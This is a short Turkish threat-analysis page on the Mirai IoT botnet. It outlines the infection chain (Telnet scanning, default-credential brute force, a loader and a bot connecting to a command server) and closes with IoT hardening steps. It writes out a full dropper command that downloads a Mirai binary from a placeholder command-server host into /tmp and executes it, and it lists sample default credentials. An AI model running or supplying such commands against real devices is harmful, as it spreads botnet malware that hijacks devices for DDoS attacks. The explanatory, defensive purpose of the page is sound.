Modern Tehdit Analizi - IoT - Botnet

Mirai Botnet Tarzi IoT Shellcode - ARM/MIPS

Mirai, 2016'da tarihin en buyuk DDoS'unu gerceklestiren IoT botnetidir. Kaynak kodu aciklandiktan sonra turevleri cogalmistir.

Mirai Enfeksiyon Zinciri

[Scanner] Rastgele IP -> port 23/2323 Telnet tara [Brute Force] 62 varsayilan kullanici/sifre dene admin/admin, root/root, root/vizxv... [Loader] wget/tftp ile binary indir, calistir [Bot Binary ARM/MIPS/x86] CNC sunucusuna baglan DDoS komutlarini bekle

Dropper Shell Komutu

busybox wget http://[CNC]/mirai.arm -O /tmp/.x chmod 777 /tmp/.x; /tmp/.x mirai

IoT Sertlestirme

1. Telnet'i devre disi birakin, SSH kullanin 2. Varsayilan sifreyi degistirin 3. Gereksiz portlari kapatin 4. Firmware guncellemelerini takip edin 5. VLAN ile IoT'u izole edin 6. Shodan ile kendi IP bloklarinizi aratın